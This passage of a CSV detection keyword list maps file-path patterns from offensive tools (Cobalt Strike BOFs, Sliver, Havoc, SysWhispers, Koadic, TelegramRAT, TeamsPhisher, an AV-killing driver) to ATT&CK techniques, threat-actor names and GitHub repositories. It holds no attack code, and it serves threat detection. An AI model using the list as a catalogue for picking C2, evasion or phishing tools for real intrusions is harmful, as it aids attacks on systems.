TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*/Synergy-httpx.git*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" +"*/syscalls/syscalls_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/syscalls/syswhispers/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/syscalls/syswhispersv2*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" 
+"*/SyscallsInject/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/SysmonQuiet*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" +"*/SysWhispers2*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"*/SysWhispers3*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 
","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"*/SysWhispers3.git*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"*/syswhispersv2*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/t3l3machus/Villain*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*/taidoor.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/TakeMyRDP*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" +"*/Talon.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" 
+"*/Talon/*Agent/Source*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/target:exe spacerunner.cs*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*/targetedKerberoast*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" +"*/targetedKerberoast.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/targets-asn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-ipv6-map4to6.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-ipv6-multicast-echo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-ipv6-multicast-invalid-dst.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-ipv6-multicast-mld.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-ipv6-multicast-slaac.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-ipv6-wordlist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-sniffer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-traceroute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/targets-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Tash.dll*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/TashClient.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/TashLoader.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/tccbypass.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/tcpshell.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*/Teamphisher.txt*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - 
TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*/Teamphisher/targets.txt*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*/teams_localdb.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/teamserver-linux.tar.gz*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/teamserver-win.zip*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/teamspeak2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/teamstracker.db*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*/teamstracker.git*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*/teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*/TelegramRAT.git*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" +"*/telnet_cdata_ftth_backdoor_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/telnet-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/telnet-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/telnet-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/terminate/Terminator.sys*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*/test32.dll*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" +"*/test64.dll*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" +"*/tests/NIST_CAVS/*.rsp*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/tests/test-bof.ps1*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*/tevora-threat/PowerView*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 